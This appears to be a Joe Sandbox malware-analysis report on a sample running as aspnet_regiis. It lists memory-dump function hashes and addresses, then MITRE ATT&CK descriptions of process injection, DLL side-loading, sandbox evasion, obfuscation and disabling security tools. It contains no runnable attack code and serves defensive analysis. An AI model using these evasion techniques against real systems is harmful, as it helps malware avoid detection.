Function 0057AB6E Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 557a8d30f6a7c597846095b6f2d22431891f584169af48a3d1747a44cda4352c
Instruction ID: 785ab65e2b6d84e041e8ef5cfe62c84af13ba605958da9d405a72532b99f46f5
Opcode Fuzzy Hash: 557a8d30f6a7c597846095b6f2d22431891f584169af48a3d1747a44cda4352c
Instruction Fuzzy Hash: AB91D4B16083018FE714DF28E88176BBBE6FBD4304F19842DE88987351DB74D808DB82

Function 00594C10 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 480fde41bfd12f151ad65f30445c4e29bd84238b6821d4b92cd69060d2790248
Instruction ID: dae92c3fe99852cf80fb838193df7b6daae14dcada44fb36c229bdf4f03c8b59
Opcode Fuzzy Hash: 480fde41bfd12f151ad65f30445c4e29bd84238b6821d4b92cd69060d2790248
Instruction Fuzzy Hash: 5A61E5316093019FDB248A28D881B2BBBE6FBD4314F19893CE9858B391D674DC46CB92

Function 0058DB90 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2751584834891066f46621d2bf4ff7a46fe69eb1e52504ddc3e52e4748a193e
Instruction ID: b67ea161119325ddb96c0b67e1284ff8a6a946d617fedf63bea57b52dc19de8a
Opcode Fuzzy Hash: e2751584834891066f46621d2bf4ff7a46fe69eb1e52504ddc3e52e4748a193e
Instruction Fuzzy Hash: CB512676A043105BD724AA18CC44B37BBF3BBD4724F2A846EE985BB395E6719C01C7E1

Function 00555880 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b825a525a1892fefedc3cb7bcc3f59d9c2f89a058fef1b294b11f7fb3719a26
Instruction ID: cafdce577732b6c80ec9515fedbba197dd450b452bb0b0aa7cfe88b2cbd28832
Opcode Fuzzy Hash: 1b825a525a1892fefedc3cb7bcc3f59d9c2f89a058fef1b294b11f7fb3719a26
Instruction Fuzzy Hash: 0551B271A047119FC714DF18C8A0926BBA1FFC9325F19466EEC958B352E730EC4ACB92

Function 0058A0C0 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b5884694bf0c3e71b17b348f7f8ea75e3c0f3891a9632c2b6854d72e7980c5f
Instruction ID: ae54f2ba1d851da0db808c3adaeb36c3887cc28d68d279bed81f8c11fb3fc947
Opcode Fuzzy Hash: 9b5884694bf0c3e71b17b348f7f8ea75e3c0f3891a9632c2b6854d72e7980c5f
Instruction Fuzzy Hash: 1D412C303483409BF721AB289C8463BBBA6FBD6310F15892ED8C1A3155D330AC41D793

Function 0058AC20 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0bea1982131dd03b7e244c15eade8158d0d52132d28dafed8fac9d41017164
Instruction ID: aba3946d34e421dc3c312f821247b814bad0e3e2d2d473c6cfac2239f58c623a
Opcode Fuzzy Hash: 0e0bea1982131dd03b7e244c15eade8158d0d52132d28dafed8fac9d41017164
Instruction Fuzzy Hash: 003137716053006BEA10BA249C85B3BBF99FF91359F14483AFD85AB252E221DC05C7A3

Function 0057872C Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5238d7322f9bbf9c53c7783aa181dae262774b788ae642037a13d7f22940baad
Instruction ID: cf5167d9e0fed58c242c953dbf9164990b8bb4d819b5ddaa9bd921d021d191a0
Opcode Fuzzy Hash: 5238d7322f9bbf9c53c7783aa181dae262774b788ae642037a13d7f22940baad
Instruction Fuzzy Hash: 0F21083065C3448BDF298F74A9D83B97B36FB65310F6092ADC44E27265DB314C46AB50

Function 00589FF0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1649295fb1477b7db2a9cf3e44ab76b69c4b3aa479a04e88ae5594c86e9f7d4
Instruction ID: bca826c96a6c5f2abbf380bc1edfa762d426e330d1f371b65ce1a8c75e9f3d54
Opcode Fuzzy Hash: e1649295fb1477b7db2a9cf3e44ab76b69c4b3aa479a04e88ae5594c86e9f7d4
Instruction Fuzzy Hash: 10117B2175421189E324AE95C885277F799EBCD324F19857BDD80AF191E275DC4183E1

Function 0057D541 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a50a05c2f2fec31dfa19429be8c030c0db81d07230f92d6d135a7a53bfbdb35
Instruction ID: 52f63ef7e2c131362434ad98d7d529114ca6f55f1b7b07362db532c4da4e8cae
Opcode Fuzzy Hash: 7a50a05c2f2fec31dfa19429be8c030c0db81d07230f92d6d135a7a53bfbdb35
Instruction Fuzzy Hash: 7A113A725493519BC725CB08A8A063ABBB2BF94315F54D81ED08327149C3758D06A7F2

Function 005876A0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 80b47d6de0715a89896910a5c688a08e7911ca46278ca2a33c293d8c6222ac9a
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3C11E933A095D80EC3169D3D8400565BFA32AA7275B794399F8F5EB2D2D622CD8A8364

Function 0057DA80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef2608c42492b657754561bd498ad70c55afd30665320728b60ee320b216277
Instruction ID: 879fc98121084a677418048002358221f7ced282e2abae05197ff60a11d90859
Opcode Fuzzy Hash: 3ef2608c42492b657754561bd498ad70c55afd30665320728b60ee320b216277
Instruction Fuzzy Hash: E2015EF160430247DB20AE64A4D5B2BEFB8BF85705F18853DE80D57602DB65EC09D6A5

Function 0055E104 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984483b2fb95de2e3c2bbbd52ea3b7c2932e618e113cc31968af4b79f318a8d3
Instruction ID: eda87e5ad42b57003ed960d1f134f2b3124504a0108d5731b9d38fed6da8b092
Opcode Fuzzy Hash: 984483b2fb95de2e3c2bbbd52ea3b7c2932e618e113cc31968af4b79f318a8d3
Instruction Fuzzy Hash: 3411E7B5C24401EEDB01EF20BD8F9283E61F7752057864826F811B6A76F6320A28AB59

Function 00556C80 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24eba06c9b1d5a73650a21d4224561bbd5cc06d03a50880e7562be93452fe34a
Instruction ID: 0274318746194acc156f995659c22b50421cac16a6b3ca2e3537e599903bceeb
Opcode Fuzzy Hash: 24eba06c9b1d5a73650a21d4224561bbd5cc06d03a50880e7562be93452fe34a
Instruction Fuzzy Hash: 21F0463638866707A311CD96DCD0967B7A7F7CA212B4D813ADD8093604C930FC0B82E0

Function 0058C540 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 64a7c8896e8eeba4bbea635fee0b30c7ab2f31a153687727d6b06e99ce911ab8
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 67D05E31608321869F64DE19A400977FBF0FAC7B11F49955EF986E3148E330EC41C2B9

Function 0055E259 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c47707cfe4d338af85898dd9705dc08fef6216e81da6931ac4336dab3216c3
Instruction ID: 93eaec273f4684116637df2e0bb3ad248522b484a411848225dd41edd5ec0aa4
Opcode Fuzzy Hash: b3c47707cfe4d338af85898dd9705dc08fef6216e81da6931ac4336dab3216c3
Instruction Fuzzy Hash: 70D05E39928001DBD604EB20EC4B934763273A22457451862EC26F7673FB228928665D

Function 00590EE3 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d6e55d98c75d26601fb4c510710217df60b5203792f80235878d9e6acf1237
Instruction ID: 6ecfb5b495c0862fcb6a2df6f4defd9448ba48aa1ee07ef05479572e90a2aea5
Opcode Fuzzy Hash: 69d6e55d98c75d26601fb4c510710217df60b5203792f80235878d9e6acf1237
Instruction Fuzzy Hash: E3D012B5E400134B9D18EB24AC8353A7275A7DB24CB04383AD40BD3313EA20D419E59F

Function 0056E8F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf21cbce670268ee2d5672542e6cf7b4ddf1a403b6f6c03e0a45c4e9ac93d395
Instruction ID: ea0e56b8b103e5954dc49c4cfabc9dc4f81a41219cb2e7e60940dc9859af866c
Opcode Fuzzy Hash: bf21cbce670268ee2d5672542e6cf7b4ddf1a403b6f6c03e0a45c4e9ac93d395
Instruction Fuzzy Hash: 88B092E5C102018FD8503A243D9642AFD28A567307F0434B6AC0722A03A626D11CC8AF

Function 0057C811 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0688ed3693ed0431b3a626e0b02b9ff456d6db02bb6757f7a3715acdabda09d5
Instruction ID: ddba48bed8ef27f3d4d11f5a91da9bc85aa4862b8fa24113c9fd462438ccf1c4
Opcode Fuzzy Hash: 0688ed3693ed0431b3a626e0b02b9ff456d6db02bb6757f7a3715acdabda09d5
Instruction Fuzzy Hash: 8EA00231948200CEC641DF54DD44579F6B9575B201F1178159158E3121C621D5145769

Function 00583C07 Relevance: 35.1, APIs: 1, Strings: 19, Instructions: 105COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00583C4D

Strings

Y, xrefs: 00583D03
5, xrefs: 00583D1B
), xrefs: 00583C83
[, xrefs: 00583CF3
Q, xrefs: 00583CC3
C, xrefs: 00583D33
S, xrefs: 00583CB3
#, xrefs: 00583CDB
=, xrefs: 00583CFB
J, xrefs: 00583C9B
U, xrefs: 00583CE3
+, xrefs: 00583C73
/, xrefs: 00583C93
W, xrefs: 00583CD3
-, xrefs: 00583CA3
], xrefs: 00583D23
_, xrefs: 00583D13
7, xrefs: 00583CBB
\, xrefs: 00583D2B

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID: #$)$+$-$/$5$7$=$C$J$Q$S$U$W$Y$[$\$]$_
API String ID: 1927566239-3571421908
Opcode ID: 64bc91163ca199dd9576cb0834187f98330071815eedac6429da5f6a8a5718c1
Instruction ID: 28e46742ee1439d2ce7ecf7726fe7ef4c4afd2ac5f84dafea93bbc68118fd3ae
Opcode Fuzzy Hash: 64bc91163ca199dd9576cb0834187f98330071815eedac6429da5f6a8a5718c1
Instruction Fuzzy Hash: C851067150C7C18EE3369B2888597DBBFE26BE6308F48895DC1DC4B392C7B9454A8B53

Function 0058207A Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 83COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00582083
VariantInit.OLEAUT32 ref: 0058208F

Strings

S, xrefs: 005820C4
Q, xrefs: 005820CC
[, xrefs: 005820A4
_, xrefs: 005820B4
Y, xrefs: 005820AC
U, xrefs: 005820DC
], xrefs: 005820BC
W, xrefs: 005820D4

Memory Dump Source

Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true

Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Q$S$U$W$Y$[$]$_
API String ID: 2610073882-2615533518
Opcode ID: 291974cb8ae2083817668c50d1a9e91ba0acd3abfde589f619b8b03b40f2151c
Instruction ID: e37739a7abf21cf1427fcb59aeab9b0c4a85abcce4274e0baa0776e3419bb773
Opcode Fuzzy Hash: 291974cb8ae2083817668c50d1a9e91ba0acd3abfde589f619b8b03b40f2151c
Instruction Fuzzy Hash: 2A412930108BC1CED7159F3C8898656BFA16BA6324F1886DCD8E90F3DBC2B5D509CB62

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

